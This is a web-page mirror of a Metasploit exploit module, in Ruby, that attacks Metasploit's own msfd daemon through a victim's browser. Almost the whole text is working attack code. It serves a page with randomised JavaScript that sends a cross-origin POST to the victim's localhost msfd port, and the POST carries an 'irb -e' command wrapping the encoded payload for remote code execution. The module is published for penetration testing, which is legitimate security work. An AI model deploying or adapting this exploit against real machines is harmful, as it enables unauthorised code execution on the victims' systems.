Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/msfd_rce_browser.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8
  include Msf::Exploit::Remote::HttpServer::HTML

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Metasploit msfd Remote Code Execution via Browser',

15
        'Description' => %q{

16
          Metasploit's msfd-service makes it possible to get a msfconsole-like

17
          interface over a TCP socket. This module connects to the msfd-socket

18
          through the victim's browser.

19


20
          To execute msfconsole-commands in JavaScript from a web application,

21
          this module places the payload in the POST-data. These POST-requests

22
          can be sent cross-domain and can therefore be sent to localhost on the

23
          victim's machine. The msfconsole-command to execute code is 'rbi -e

24
          "CODE"'.

25


26
          Exploitation when the browser is running on Windows is unreliable and

27
          the exploit is only usable when IE is used and the quiet-flag has been

28
          passed to msf-daemon.

29
        },

30
        'License' => BSD_LICENSE,

31
        'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',

32
        'Platform' => 'ruby',

33
        'Arch' => ARCH_RUBY,

34
        'Targets' => [

35
          [ 'Automatic', {}],

36
        ],

37
        'Payload' => {

38
          'Space' => 8192, # Arbitrary limit

39
          'DisableNops' => true,

40
          'BadChars' => "\x22\x0a"

41
        },

42
        'DisclosureDate' => '2018-04-11', # Vendor notification

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options([

53
      OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),

54
      OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])

55
    ])

56
  end

57


58
  def exploit

59
    super

60
  end

61


62
  def on_request_uri(cli, request)

63
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"

64
    sc = payload.encoded

65
    shellcode = "\\x" + sc.unpack('U' * sc.length).collect { |x| x.to_s 16 }.join("\\x")

66
    var1 = rand_text_alpha(rand(6..11))

67
    var2 = rand_text_alpha(rand(6..11))

68
    html = <<~EOS

69
      <html>

70
      <head></head>

71
      <body>

72
      <script>

73
      var #{var1} = new XMLHttpRequest();

74
      #{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);

75
      var #{var2} = String("#{shellcode}");

76
      #{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");

77
      </script>

78
      </body>

79
      </html>

80
    EOS

81
    print_status("#{msg} Sending HTML...")

82
    send_response(cli, html, { 'Content-Type' => 'text/html' })

83
  end

84
end

85


86